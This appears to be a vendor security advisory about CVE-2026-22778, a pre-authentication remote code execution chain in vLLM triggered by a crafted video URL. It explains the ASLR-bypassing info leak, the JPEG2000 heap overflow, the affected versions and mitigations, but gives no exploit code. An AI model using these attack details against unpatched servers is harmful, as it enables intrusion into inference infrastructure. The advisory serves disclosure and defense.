OX Security — Critical vLLM RCE via malicious video URL (CVE-2026-22778)

  • CVE-2026-22778 (GHSA-4r2x-xpjr-7cvv) is a critical remote code execution chain in vLLM, the widely-used LLM serving framework with 3M+ monthly PyPI downloads.
  • Attack vector: send a crafted video URL to vLLM's OpenAI-compatible Completions or Invocations endpoint → vLLM downloads the video → a malicious JPEG2000 cdef box triggers a heap overflow in the OpenCV/FFmpeg decoder → arbitrary command execution on the server.
  • The chain exploits two bugs: (1) a PIL error message info leak that exposes memory addresses and bypasses ASLR, and (2) a JPEG2000 cdef box heap overflow where the Y (luma) plane is remapped into the smaller U (chroma) buffer, causing a controlled 0.75×W×H byte overflow.
  • Zero authentication required: default vLLM instances have no API key. Even with a non-default API key enabled, the Invocations route processes the payload pre-auth.
  • Only deployments serving a video-capable model are affected — text-only or image-only endpoints are not vulnerable.
  • The vulnerability was fixed in vLLM 0.14.1. All prior versions serving video models are affected.
  • The root cause sits deep in the media pipeline: vLLM delegates video decoding to cv2.VideoCapture over raw downloaded bytes, trusting the container format without sanitization.

Why it matters

  • vLLM is the dominant open-source LLM serving engine — used in production by thousands of organizations. A pre-auth RCE in it means attackers can compromise AI inference infrastructure with a single HTTP request.
  • Multimodal models (video, image) are rapidly being adopted, expanding vLLM's attack surface beyond text-only deployments. This is the fourth vLLM CVE in two months (after 22773, 24779, 22807).
  • The attack requires no credentials, no user interaction, and no local access — just a reachable vLLM endpoint accepting video input.

What to do

  • Upgrade immediately to vLLM ≥ 0.14.1 if you serve video-capable models.
  • Enable API authentication: never expose vLLM without an API key, and restrict the Invocations route.
  • Network segmentation: vLLM endpoints should not be directly internet-facing. Place them behind an API gateway with auth and rate limiting.
  • Audit multimodal inputs: consider pre-validating or sandboxing media processing before it reaches the inference engine.

Sources